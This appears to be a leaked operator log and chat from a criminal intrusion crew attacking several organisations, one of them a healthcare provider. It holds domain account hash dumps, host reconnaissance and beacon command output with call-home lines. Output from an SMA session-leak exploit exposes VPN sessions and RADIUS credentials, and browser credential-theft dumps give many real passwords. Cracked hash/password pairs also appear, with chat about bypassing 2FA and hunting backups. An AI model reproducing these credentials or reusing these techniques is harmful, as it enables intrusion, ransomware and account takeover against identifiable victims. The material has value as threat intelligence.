6686 phabberstad 64f12cddaa88057e06a81b54e73b949b 66050
2710 cblascyk a87f3a337d73085c45f9416be5787d86 66048
3189 PRH-2686$ 70fc2d23af2359326b865ffe594ad0c2 4096
4673 IT-2019$ 566e5b77f23763c52e83a7788c9e14b2 4098
4647 PRH-3060$ b3307b13c3a2aec0ebef6a6258751705 4096
3258 PRH-2665$ 1a83e7caa351f127d39fd1a8d92d6d80 4096
4693 regcopier e4d271a1bcc47226f28dcbac05b8a746 66048
3338 PRH-2619$ 3e4fddf127114c3c697a233eb39bf9d9 4096
6679 PRH-3118$ c461bdecd97243d7e03bbe30c6574d96 4096
7114 PRH-3079$ 83fc2e2fe2fa464098c3791387946de4 4096
2879 PRH-2700$ 7166b10d4a7149cc548ccc76ffc19305 4096
5608 PRH-3006$ a859a85889694e7759325b985e97a05a 4096
3195 PRH-2687$ ff531fa3018d25bfeef924a5a0d3c2cc 4096
2755 PRH-2277$ 696259e4ed0d8c407f1f50bbea03ca2c 4096
2760 PRH-2256$ e6f2a18d7bff6573eda2e19e87766407 4096
3073 Internet 4e6342ecc5ed563057800830d710dd61 66048
2765 PRH-2262$ 119e026af4c773fb82e6dad23f44ba04 4096
4691 DESKTOP-FVP2GR3$ 1b4e127fe1bbb250a7faeb1b64905620 4096
4682 klesetmoe 64f12cddaa88057e06a81b54e73b949b 66048
7148 MorrisWC 730c746b0c56134750fac4c6b09cc3b1 512
3237 PRH-2674$ 9ec59a22ac3dee9d87d544fb33f4557b 4096
6645 PRH-3084$ a6a654d1aec70e69da6a01cdc8ad284a 4096
4636 PRH-3062$ bf9e229a5d28ab7e62f0f788f8c6ee1a 4096
6657 PRH-3070$ 31caf476d2872388520203218eec76a4 4096
4622 tice f4adb5306921842dc8a1bf898d3b8d12 512
2253 scanderson 32ed87bdb5fdc5e9cba88547376818d4 66048
3247 kenglund 0a5f68a6e5f71a35090548e773865607 66048
3282 PRH-2673$ 6a1f9741dd93f24444198037e582faae 4096
2962 ap 65611c1e0782a133d661abee943f6d48 66048
6703 jweigand 3adde9cefbb0066034fbf5bd29f10f92 66048
3266 PRH-2850$ b950d2d89e39cbf02e1bcb7c6136a5c0 4096
6642 MAINT-PC$ 68c94e3b89b0085bdfb45fc233c284d6 4096
3313 PRH-2882$ dc0cb5959986ad2b2672de976274ae88 4096
7141 TFagre 698bb3058165441bd7c7677a5e3a258a 512
6649 PRH-3075$ 568ff430e4d95e26aaecddc15241c80a 4096
6652 PRH-3089$ 3716cc7a6774ae0a5c8e95bb6ed74fb2 4096
3290 PRH-2239$ 73ee8ac34792aaa70a4114401e660b28 4096
2764 PRH-2234$ 1a3628e26d311e210900e78f3550de84 4096
4678 PRH-3114$ b71b17fdf762fafecec3029454d76e8f 4096
4679 PRH-3106$ 4b23fbe17aa8ba625b7e1715f2656fc9 4096
2729 PRH-2933$ bad5fcbf55f954e3ec65909ec34de1f0 4096
6644 PRH-3065$ 67a03f5b5b542e9ab4327cdacd7c801c 4096
7121 PRH-3096$ 5be0a9f8af5732d3baae6301930839d0 4096
2757 PRH-2276$ 80b8beec30ec27b2798c7b6dba2052e8 4096
6666 PRH-MEI$ 857b2a1b3f41033f539cffe52155695e 4096
3207 PRH-2834$ a5d5812d4c70f5618a164a300d46fff3 4096
2152 PRH-1269$ 1c6153da7abbeb7056f58e93ad2c46b5 4096
4680 PRH-3110$ 9893e98370272199aff111673e2d17f1 4096
6676 PRH-3124$ 92861a7880fef85f29d0afeb051c32b3 4096
2739 PRH-2236$ 8899522f0182d3e552b92eec13bdd5aa 4096
2811 PRH-2622$ 475a68c7350d73f786f65dce73ef9842 4096
2728 PRH-2212$ 0224d77ea25db5898cc5cc0d112648cb 4096
2800 PRH-2615$ a9e26e5121903c2bde20a39fae02148e 4096
3250 PRH-2667$ d1a4a50e084c89437cb74f2a7e723022 4096
2168 cards 61e2380be7f8f2cf2db189e3151c78ce 66048
4635 PRH-3063$ 7e10ba789f8755a9c7b6373a99247076 4096
7112 PRH-3083$ f65d6477e2366f0a0fd1a7ae8da96bf1 4096
4648 MOIT$ 44ccc7cf02cb8675b9044c63fae7a769 4096
2812 PRH-2621$ 8d4960c3800797d0b5d06e05436f7855 4096
3136 PRH-2620$ 50a089f04ebfebde6876a272349a069f 4096
2617 PRH-0084$ 4dbdc968f6be735671b93ffa8a1ba2fd 4096
4620 PRH-2903$ 8ada3e3d22e8d411b43a63bf69a1a265 4096
7118 PRH-3081$ ec0044e9174328840eb8140e79382bf3 4096
3353 PRH-2966$ 9cb90cb83aa465d24ad8295faab5fe41 4096
6683 PRH-3111$ b58c0252d36b3d1c51f820e7f8d263b4 4096
3241 PRH-2659$ 8f5a4e7a7ed251f2607a0050e322a4c3 4096
3238 PRH-2675$ 52333753086a032fc62ecebc34ae16f7 4096
3244 PRH-2662$ 91239dd34f0ef561349864ff673cb0fe 4096
2867 sschmid 16a29d27277d8d2c3716adfe89102348 512
2644 PRH-2135$ d87cc5f450f0c702ba9a4eb8d117a9b9 4096
3020 CLINIC-LENOVO$ 9d276026a118352babecd0608ea9a541 4096
4663 sstorck fc191f14aea279d501e6e7fa4140c489 66048
6701 terickson dae2c852487dccdb6207a51353b6ca01 66048
4685 alharnisch ee098fd8f7bd735743966c13570a0086 66048
4634 PRH-3082$ 5ad42d43a2a22815036142cef8d5972a 4096
7115 PRH-3088$ ae913c8772f0a710609d417487bd45a7 4096
2472 jsplichal 28761d18c08f46ba9e4af80a34a955fe 66048
3311 PRH-2872$ efb1073b10100eea274f43815ee98e1f 4096
4638 kbrown e72d306b4355e39ff4b05212cd98c15a 66048
7133 PRH-3126$ cc8ac6ee166cf04445198e7032796c85 4096
3257 PRH-2670$ a77bae0344da98dfa3c4e8bba73b8af8 4096
3275 PRH-26679$ 2be3023f9c0114ff397e895344212974 4096
3281 PRH-2677$ 5de7f8563add8809eb018d4a34f3644a 4096
3185 PRH-2617$ 178998385c222fea638da8b4a55ebb13 4096
4674 PRH-3122$ 485b0ceca0561b73dd484ce61c27a12a 4096
3268 PRH-2680$ 0ef49b5060537f7c62f5a7fe704f139e 4096
3240 PRH-2658$ a4fb0e802f0ef8f244d6251ad180e19b 4096
2658 mdanelke 4ad6fab667ac92f0f5f3a2e45c8c49da 66048
2745 PRH-2257$ 5a2c8fa3a78cef0747c434cf46a57928 4096
6636 jcarter fc83a57b90d4748f68fd474b4ce0b07e 512
3362 PRH-2923$ 7191c40b33bca86cf240acb63d3cc5da 4096
2782 order eb3c1b2253c1abf545acb0db00704806 66048
3246 PRH-2663$ 77c3176ef2d7642ddac6d85736be174f 4096
7110 PRH-2993$ 350a7dc227a0ecd4c9ad528885f33223 4096
2881 PRH-2702$ 0a3f399eaa21662e57f0695d5c86398f 4096
3356 PRH-2975$ 1df40826b608198f88479f329b54019f 4096
7123 kmikkelson $4daa86c8f9a4cf8aed1e49513b57a104 66048
3243 PRH-2202$ e4d66e7fb0499f2dff51d72829f0a7b5 4096
6654 PRH-3077$ 8e5c3d07af7cd48e511f5518726b999 4096
3231 PRH-2119$ 18c1b205ba5c27c68904db362597c5d3 4096
6674 PRH-3131$ 03988e64ab2246df567dfdf22f839d06 4096
3317 PRH-2881$ 20b4ed6e8977599ac239d5cfeb97145c 4096
6692 mwenzel 3a6fbaea894360a3d55b2a21d839a70c 66048
6693 tsyversongrant 3a062933b5976cbff2ab61155bb511b5 512
4639 PRH-3067$ 9ed411ce8029085f69494997ccf6a9fe0 4096
7134 PRH-3113$ 73db7c55fea363947cbe6ad5ef5f70e9 4096
3245 PRH-2661$ 328ac1ecc07035afec94cf80163b8c6c 4096
5618 PRH-2678$ c60bf8b519df9b11568b0e7ed28f13f1 4096
3252 PRH-2666$ 870177f36cafe4b0ecaa13d10dd8355 4096
2854 sdenoble eb3c1b2253c1abf545acb0db00704806 66048
7113 PRH-3076$ 54935d148299e8c40e11c9987b12a96e 4096
3327 PRH-2683$ ffbe9c9af24c640a65681ccddc2de8e9 4096
4629 PRH-2992$ 737e07ed24a35ded2b9691c188e46eac 4096
4615 ewoodke 64f12cddaa88057e06a81b54e73b949b 66048
3042 tracking c39f2beb3d2ec06a62cb887fb391dee0 66048
3242 PRH-2660$ 44caef032b5ced7d2b1d49f7e15e810f 4096
3193 ambulance 74b97c4ce24198d4af22db7910f3ef75 66048
2976 cr 7311df4eac99d671e447bd797ddc8d7f 66048
3259 PRH-2664$ 68846af71a5b1f8995ff99aad561871b 4096
3190 KRIS-PRH-2685$ bacb03d24484cc94f3db1153982ba146 4096
2562 cosborne 581ffce63b88cbab82f6decb9a5eb6a2 66048
3346 PRH-2240$ 50d6f80d816f30e90d2e7cbd1ca3e4af 4096
7605 SPARE-2020$ a2bb2a57c709ea006628818c29dc481d 4096
5614 jennen 5ca241a638da398b2275af36914a1d94 66048
3017 fbackman 2d09850f9d73356e8b229419fa4c8ccb 66048
7128 PRH-3129$ 297208f2af96f7dca6c96087eadb4ba4 4096
7104 PRH2909$ 932ad6e3cc9376702f849f67d1fc6644 4096
2412 jmcnamar 19f8313a6e13e016e7be22cc394be49a 66048
2243 mamundson 54cf67c3581e8f28dac96f5cbff80570 66048
4637 jwulff 63d67b406723fac633524f98d6011302 66048
3357 PRH-2919$ b9a0d8b26f174ac3b12b9a4049ac2ec4 4096
1235 nlarson 64f12cddaa88057e06a81b54e73b949b 66080
2928 acarr f25e966e3cbc04a7c274b71457497d34 66048
5612 tnyreen 64f12cddaa88057e06a81b54e73b949b 66048
1239 SLV 64f12cddaa88057e06a81b54e73b949b 66080
6689 STOCK_LS$ c4517504b54f9ef3501ae2d774d4b679 4096
6633 ldivald 64f12cddaa88057e06a81b54e73b949b 66048
2847 crohloff ff366185621b9430eaa0bdd22c34408a 66048
6690 DIVALD-2020$ c39bb181960387e05f9b8feee7f829af 4096
3261 dlesmeister b488feb87b8744f87650c094779a4cfa 512
2324 smartin 39a6ccd7d6d2babdd11650ca3e4f2e7f 66048
3330 JFS-JOHNFSTOCK$ 306104c9fd5a890eda9b3a777fe7f570 4096
2483 pholmes 9361c8cfcbe72efc56fbfc38bfd3ac34 66048
4664 swilson 2dc9c0e9a9dbf55f0945ce24fb5e7fa5 66048
3173 gwenstrom e2d2aadee156f45baa63e6b6d9e1822a 66048
2200 spl 6f70de922592d49a9fd650eff31d3b34 66048
1223 JKR 48b01180c8576019c6fd63ee4dfb1444 66080
2294 jstock a273e25d41c20e4f5c4db65b47ed7593 66048
2585 sschmall 210b68c4a2a5725bd5197f38eff6911a 66048
3294 aseger 3a79a42a68d85d852cd11c2879b8afc0 66048
2336 aaltamirano 14633fe81d99ada0956694ccef9c77e7 66048
2794 akowalski d513b1530aad3647fc22f56f8deb33ac 66048
6680 PRH-3112$ 10fb6ab39d766ffcaf49880337f2fe94 4096
3315 PRH-2878$ 36ab8132a68234534f69d2fd9799fe7c 4096
6682 PRH-3116$ 460edfc9c6ac035b6f43ba370b0931ce 4096
2772 cpadmin c817d427000071f7e372e9ee4405f0e1 66048
3345 PRH-1250$ 50c37bce23b29221870fe50c65e1b7ff 4096
1209 bmoore 03096f8607f2f99d8e56d9b63965a2cd 66080
2672 tschmidt 0484108954680796ae055f0a1f4389ac 66048
3041 vlee 6017f27b91078de3dadd26256c5e38bf 512
3068 treadmill 7d60508599c6f6eea2e7957f7482782a 66048
2222 mblair 1eadba7d484394d956fae10223c98a51 66048
3092 MAIL$ 51a02ca6c0fffa13df8ac9f6f298838d 4096
3027 canderson 0c05952f0ef5da033b14ec18bc32d4b1 66048
2626 jdahle 64f12cddaa88057e06a81b54e73b949b 66048
2491 jolsen b35fd07bb31f9518dd01b29a8bc67f13 66048
3094 aathey 32e198b25c1bca58629b6282b4b69ac8 66048
6615 thovde 64f12cddaa88057e06a81b54e73b949b 66048
6608 PRH-3008$ 38202670d12d4c3b61f7b42a8dd5c1f7 4096
3066 PRH-3000$ 996a2fdc1c49fc81a6e39c44ab53edc4 4096
7153 mtoso a1bfa9473289b6f10f741d90c0fc0450 512
3318 PRH-2876$ 914627e69b5b63a93f56f2c33bf245c4 4096
3364 ___VMware_Conv_SA___ 7e6680540cba43fd971c160ad4e483d6 66048
7143 DESKTOP-M3CLUMV$ aecc192c549c84e506675e3515bd9872 4096
2137 mwood 679f896c6af8720a9ac9ca7b3fa50d25 66048
2280 kdaly 64f12cddaa88057e06a81b54e73b949b 66048
2836 PRH-2273$ f3a5088e090b552c11e13666165cf1b1 4096
7137 PRH-2790$ 6db68b8974bedd975b742610c00e9e69 4096
2810 PRH-2623$ 35fad9d1f36911e0ebcd46834252e627 4096
6681 PRH-3123$ 5ea86b4846b81644dcfac0537eec0681 4096
3307 PRH-2873$ 0b69c9eff062308d3d3c52403cefa089 4096
2116 PRH-2979$ 72b4fced4bb842a6de5fbc91a8e916fb 4096
4696 AThormodson 99e86640e8059a212fa80d8c99bfa0d2 512
6706 LRH000262$ 41b2e6741584b2f7c92a4768a2b88cde 4096
2228 tha 722dd030aca3a775fe4a3537b412dd2d 66048
1206 chartroom 7ce21f17c0aee7fb9ceba532d0546ad6 66080
2553 nhoffman cb0abaa50a8f3dc4fc24f04548a41389 66048
4657 PRH-3103$ b6bfc4ba92977ca9a9a82e442ab6a157 4096
6617 Lungs d4c31c67a8e1e9c5a901608fc053e86d 66048
5616 bsmith 64f12cddaa88057e06a81b54e73b949b 66048
2515 rlien 2d3bffbe9b944bac2416622293868061 66048
2665 dsperr 30baf37feb6e2f61e0c2ad226b7ec372 66048
4697 mtkerr e20e421380a905858cd7cca7e2334712 66048
3342 sborsgard b3255351d8dfe7cdedf3f552a49146d6 66048
3312 PRH-2874$ ddd0b075c561be1bd6107e1f8089ae48 4096
7108 jthompson cd9537fd09f00f0377c186febc42b3eb 66048
2906 arisbrudt 64f12cddaa88057e06a81b54e73b949b 66048
2326 nolson becedb42ec3c5c7f9655255338be4453c 66048
3208 sberg 64f12cddaa88057e06a81b54e73b949b 66048
3096 pgorman 6b8ba5f3aae982855e5551b8c7936d53 66048
7109 rjhoyt e690e3bf09962403b980bb6b81f3df5f 66048
3071 FPSERVER$ 43e376323eadee8b16c7989c8df01359 532480
6699 jtotland 218143d40917d213ef5dd38998ee45e0 66048
2618 ituser ab310ea1a05dc32528c9e5102a26b294 66048
2675 kgerber 14a6939d98f10b267219e6374ef230cd 66048
2880 PRH-2701$ cbb0ca44170500764bbc2b2eef09026b 4096
2669 phaberer 2f7788fa03a3deed9c4b43d6204e8a85 66048
6675 PRH-3125$ dd43b97954bac2493f287d1b19162bc9 4096
3145 WSERVER3-PC$ 136a1889dbbeaf19fe659acf8737767 4096
2281 RMeichsner 64f12cddaa88057e06a81b54e73b949b 66048
5604 ELEAHSERVER$ 2db5eb12f6f902bcf78ff12f643fa6c2 532480
500 Administrator db74c9408655f77f65b01d248fa459df 66048
2666 krogahn 615f178fd1afa75283f4c023c27035af 66048
3319 PRH-2880$ 8839eda0225bac49e0725b472c16822b 4096
4612 PRH-3001$ 1b6812ece2fbe68b993ac64c3cecb0d2 4096
1202 sos bc73e083d3eb8f3d3e098010a1fd8127 66080
1240 SMA 4e426eb9d160988d2a0f2b5bc0473aa1 66080
1201 lab f52d5c82de6ecc8f7d0b1a9d5ff3672f 66080
3119 PRH-1169$ 3e159cd25b9ba4938cd24b272a0685ba 4096
3297 hdomek 64f12cddaa88057e06a81b54e73b949b 66048
2805 snordby 7ce21f17c0aee7fb9ceba532d0546ad6 66048
2464 PRH-1133$ cff5753db280fd3402e9da745252930b 4096
7157 LRHC$ 81b9f3c594d556c0091c8deff7486dc6 2080
2502 PRH-3041$ f65e3cc24bbb1e480f967fcb22ab63d0 4096
2525 jhotvedt c98a8b1efa7a564c9247411ecfe8d8c0 66048
6668 mruegemer 115694b78a8411438f5a092847b30ebe 512
2907 PRH-2955$ 7d2fde70f0b1c3aa7729bcb564269e57 4096
4687 val 812792a1f13bb10964ed1dfeac78c64b 66048
7129 PRH-2213$ 1a34202f6f4759977ed502055043245a 4096
3045 tbuseth 1a60a6e3a4db305a9cbc8fc4522eed2d 66048
4670 PRH-3127$ 393a0c622108d8e097268fa00b79dc30 4096
3176 ELEAHBDC$ f5edff92ccf8406f26597614a5b458ba 532480
2604 SHAREPOINT$ b994bf3a81af1e80dbc57e9b3c8c5958 4096
2311 ELBOW-102$ 7cc5cfe0d26a2c7059058399aa1ee070c 4096
5607 PRH-3005$ cfbd8ef7643f720e4fb0e90e88f471e0 4096
``under the juicebox here try it```
autodiscover.lrhc.org 52.97.141.88 Sign in to Outlook
``````
m.lrhc.org 40.112.142.148 Windows Microsoft-IIS 10.0 Microsoft Azure Web App - Error 404
lrhc.org 52.41.140.55 Lake Region Healthcare | Lake Region Healthcare
autodiscover.lrhc.org 52.97.141.88 Sign in to Outlook
sip.lrhc.org 52.112.192.139 RTC 7.0
smtp.lrhc.org 66.228.239.132
mail.lrhc.org 66.228.239.133
ftp.lrhc.org 66.228.239.137
support.lrhc.org 66.228.239.151 Apache-Coyote 1.1 Web Help Desk
patch.lrhc.org 66.228.239.157
``````

I tried to log in under nelson, but so far no luck with the mail, what's going on? I've calmed down now.
beacon> ls C:\Users\cmelliott\AppData\Local\Microsoft\Edge
[*] Tasked beacon to list files in C:\Users\cmelliott\AppData\Local\Microsoft\Edge
[+] host called home, sent: 77 bytes
[*] Listing: C:\Users\cmelliott\AppData\Local\Microsoft\Edge\

 Size Type Last Modified Name
 ---- ---- ------------- ----
Give me a listing of the hedgehog folder. He uses chrome. I don't know how to remove it. So he didn't have a hedgehog or did he?
10.10.220.45:445 (platform: 500 version: 5.1 name: PAULSANDERSON domain: FFMG)
``and not in the browser directory he's looking in vault[ ](https://mediaeveryone.com/group/lrhc-org?msg=STFrsGWwCj4KENyy6) sharp web is outdated for hedgehog[ ](https://mediaeveryone.com/direct/hjejta5RxgeJ37xnEyJcaRFnKQqepiffHq?msg=6Bge7NXiWyfDC5pGH) no, the word domain confused me)) password and address192.168.188.64aDfoj344*#l2eh2 want to get into the radius?
[!] found radius domain creds
[+] aDfoj344*#l2eh2@192.168.188.64
```
How do you parse this? Where login, where the password? pngcpower.comKrasavchik) ekseshnik assembled, downloaded by browser and ran as pulled?[ ](https://mediaeveryone.com/direct/hjejta5RxgeJ37xnEyJcaRFnKQqepiffHq?msg=gXcZCyJhWJA37j9mc) Yes, I already pulled everywhere, I will try to go on and under the other actors also blocked everything?i have no way to generate backup codes, as @user8 says to work through vpnobratis to @user8 as an option is to put backup codes to bypass 2fap tried to open the network management to see the ip - so immediately dyskonnectputaet, but there does not give anything does not let up? there rpnomo can connect? came in, but there kmd turned off, verashell does not start. I logged in, but it's not like I'm logged in, I can't log in, I have no authorization, the session key might have changed.
login via session
``````
 ´´capture ,´´
login via session 2fa

``````
     [+] Found: SessionID: 1Ao1qakSkqZUQ1Yg1r1V8Z0n7l7axQdQUQAH4HgrtHQ= userType: 1 userName: abarter Password: warrenwitches Domain: pngcdomain
``....open ip - login/passwordwhat are the creds then?
[+] Checking URL https://205.236.0.43
[+] Found old SMA version (<9.x)
[+] Appliance running version 9.0.0.9-26sv
``What's the sma?`` the creed from the sma is not working so hot so go to work right now+and the new coba``
newiro.com
160.202.116.42:13856
HvXzqUm87g2bQZCj6wqRTbXGqW1jWdVwAEq
``Insession 2favpn''
[+] Checking URL https://205.236.0.43
[+] Found old SMA version (<9.x)
[+] Appliance running version 9.0.0.9-26sv

[+] Leaking sessions to dump configuration.
[+] Attempting to dump sessions from https://205.236.0.43
      [+] Found: SessionID: 1Ao1qakSkqZUQ1Yg1r1V8Z0n7l7l7axQdQUQAH4HgrtHQ= userType: 1 userName: abarter Password: warrenwitches Domain: pngcdomain
      [+] Found: SessionID: O1DgDOf7kN2aFj18o7YPpz4hRCEUQj16ekh8Z18qBFE= userType: 1 userName: ajackson Password: tessakitty0625 Domain: pngcdomain
      [+] Found: SessionID: UkvbkafqdnyTOwAHibeL3GQY4Uy31VVdg8h0jqldA1g= userType: 1 userName: mdonovan Password: FUH@ck3rs! Domain: pngcdomain
      [+] Found: SessionID: b1CAsgAi6GwDG5Ab6yC9Z0Xj9cbl5axwogMpNoWpu24= userType: 1 userName: tstubblefield Password: LordofLords2 Domain: pngcdomain
[+] Done with https://205.236.0.43, found 4 sessions
[+] Looking for RADIUS domain creds
[+] Found radius domains, parsing
[!!] Found radius domain creds
[+] aDfoj344*#l2eh2@192.168.188.64

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'PNGC-ACCTRDS-01 (Dual Monitors)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-01.pngc.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'PNGC-ACCTRDS-01 (Single Monitor)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-01.pngc.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 25, 'name': 'PNGC-RDS-01 (Dual Monitors)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-RDS-01.pngc.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 25, 'name': 'PNGC-RDS-01 (Single Monitor)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-RDS-01.pngc.com'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'PNGC-ACCTSQL-01 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.96'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'PNGC-ACCTRDS-01 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.97'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'PNGC-ACCTSQL-02 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.129'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'PNGC-ACCTRDS-02 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.128'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 44, 'name': 'PNGC-ACCTRDS-02 (Single Monitor)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-02.pngc.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 44, 'name': 'PNGC-ACCTRDS-02 (Dual Monitors)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-02.pngc.com'}
``snipermail didn't work? maybe the password will match, it looks like we'll have to go through it, it's unlikely that the foreman has access to backups it's a developer's car of some kind``http://pdiprodweb/FocalPoint/Login.aspx
what do we got here?
--- Chromium Credential (User: gkeller) ---
URL : https://designcloud.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99

--- Chromium Credential (User: gkeller) ---
URL : https://login.microsoftonline.com/common/login
Username : gkeller@waterway.com
Password : W

--- Chromium Credential (User: gkeller) ---
URL : https://id.atlassian.com/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : http://pdiprodweb/FocalPoint/Login.aspx
Username : waterway\gkeller
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://github.com/session
Username : gkellerww
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://smartscan.controlscan.com/security/login
Username : 650000010503764
Password : u7i2jwPWZdfCwcU

--- Chromium Credential (User: gkeller) ---
URL : https://waterway.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://waterway1578930554.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://www.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99

``Want hostnames - write hostnames locally in the hosts file and ips doesn't resolve sox hostnames again?'' Although it is unlikely there is a backupsystem.
URL : https://system.netsuite.com/
``Agalol)``
URL : http://wwsql01/
Username : sa
Password : sa

``````
[*] Beginning Google Chrome extraction.


[+] received output:
--- Chromium Credential (User: mapusatera) ---
URL : https://auth.monday.com/users/invitation/accept
Username : 3146293823
Password : BlML#D6oJ155

--- Chromium Credential (User: mapusatera) ---
URL : https://waterwaycarwash.monday.com/users/sign_in
Username : 3146293823
Password : BlML#D6oJ155

--- Chromium Credential (User: mapusatera) ---
URL : https://www.cnn.com/account/register
Username : 63367
Password : Wf$.tP-sF2Z4pF*

--- Chromium Credential (User: mapusatera) ---
URL : https://aim.luminatehealth.com/login
Username : michaelpusatera@gmail.com
Password : kUVkch.4M.YBR9X

--- Chromium Credential (User: mapusatera) ---
URL :
Username : michaelpusatera@gmail.com
Password : 715Drew

--- Chromium Credential (User: mapusatera) ---
URL : https://www.hollisterco.com/shop/OrderItemDisplayView
Username :
Password : N-nC2c*bTB_C-v-

--- Chromium Credential (User: mapusatera) ---
URL : https://shop.lululemon.com/shop/checkout/confirmation
Username : amybrinkman13@gmail.com
Password : fws5z&mQtf5WUVH

--- Chromium Credential (User: mapusatera) ---
URL : https://www.ae.com/us/en/cart
Username : morganpusatera@icloud.com
Password : ILOVEDANCE123\

[*] Finished Google Chrome extraction.

[*] Beginning Edge Extraction.

--- Chromium Credential (User: mapusatera) ---
URL : https://system.netsuite.com/
Username : mpusatera@sotelsystems.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : transact@waterway.com
Password : $tqMy2K5%T#r

--- Chromium Credential (User: mapusatera) ---
URL : http://wwsql01/
Username : sa
Password : sa

--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : map@waterway.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : sa
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : map@waterway.com
Password : %0%f#rC!5vJj

--- Chromium Credential (User: mapusatera) ---
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1

--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : waterway\administrator
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://signin.quicken.com/
Username : michaelpusatera@gmail.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://www.waterway.com/
Username : michaelpusatera@gmail.com
Password : fgSrBr%2#cJx

--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : michaelpusatera@gmail.com
Password : Richie42

[*] Finished Edge extraction.

[*] Done.

``````

User: mapusatera - IP Address: 192.168.0.164
User: DBunte - IP Address: 192.168.90.2
User: gkeller - IP Address: 192.168.0.162
User: Quser - IP Address: 192.168.13.57

``````
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1

````https://mail.datotel.com/owa/ ``customercare@waterway.com Wc#2020!``http://192.168.0.10:3000 ``http://192.168.0.9:3000/auth/login?redirect=%2F ``Did you find anything outside the domain by the way? try snipermail? try going into the mail https://192.168.0.115/-нимблв nabble?
BACKUPDVR.waterway.com
 
192.168.0.46:443
192.168.0.46:80
``We'll make sure everyone's found no movement yet,``
beacon> portscan 192.168.0.119 1-10000 icmp 1024
[*] Tasked beacon to scan ports 1-10000 on 192.168.0.119
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
?™s replica off so 100% loss anrichable makes no sense, you have to scan from those ports which are lossy to some ports 100% lossmoy not paying attention (it with some computers anrichable `Destination host unreachable` so what's the trick is ``.
Pinging BACKUP.waterway.com [192.168.0.119] with 32 bytes of data:
Reply from 192.168.0.192: Destination host unreachable.

Ping statistics for 192.168.0.119:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:08:09> portscan 192.168.0.119 1-10000
``````
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:05:54> portscan BACKUP 1-10000 icmp 1024
[*] Tasked beacon to scan ports 1-10000 on BACKUP
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:06:18> shell ping BACKUP -n 1
[*] Tasked beacon to run: ping BACKUP -n 1
[+] host called home, sent: 47 bytes
[+] received output:

Pinging BACKUP.waterway.com [192.168.0.119] with 32 bytes of data:
Reply from 192.168.0.192: Destination host unreachable.

Ping statistics for 192.168.0.119:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:08:09> portscan 192.168.0.119 1-10000 icmp 1024
[*] Tasked beacon to scan ports 1-10000 on 192.168.0.119
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
``````
datavault Waterway727
domainrestore Waterway727
mapusatera Gators1853
Administrator 1853Gators
veeam_admin 99Waterway
Applied Waterway99
DBunte Waterway99
gkeller Waterway76
SEnglert Waterway99!
``````
594d1d0f2355dbd18bab80250cd9a1c4 Waterway727
594d1d0f2355dbd18bab80250cd9a1c4 Waterway727
c9f45ab5e6cc7b11dcf9b3bce3fa64df Gators1853
ee54eb9485bf78494a7074cb7b0513a0 1853Gators
a313f6cf5fb92a96195435f9a6e4b5a9 99Waterway
debd2d79f79e305817da0ec58509d686 Waterway99
debd2d79f79e305817da0ec58509d686 Waterway99
134cee9671bb94bffdaefb6f84f5989d Waterway76
036c9df1839c6adc5e65c74fffdca10b Waterway99!

``Can I have these hashes, please?
```
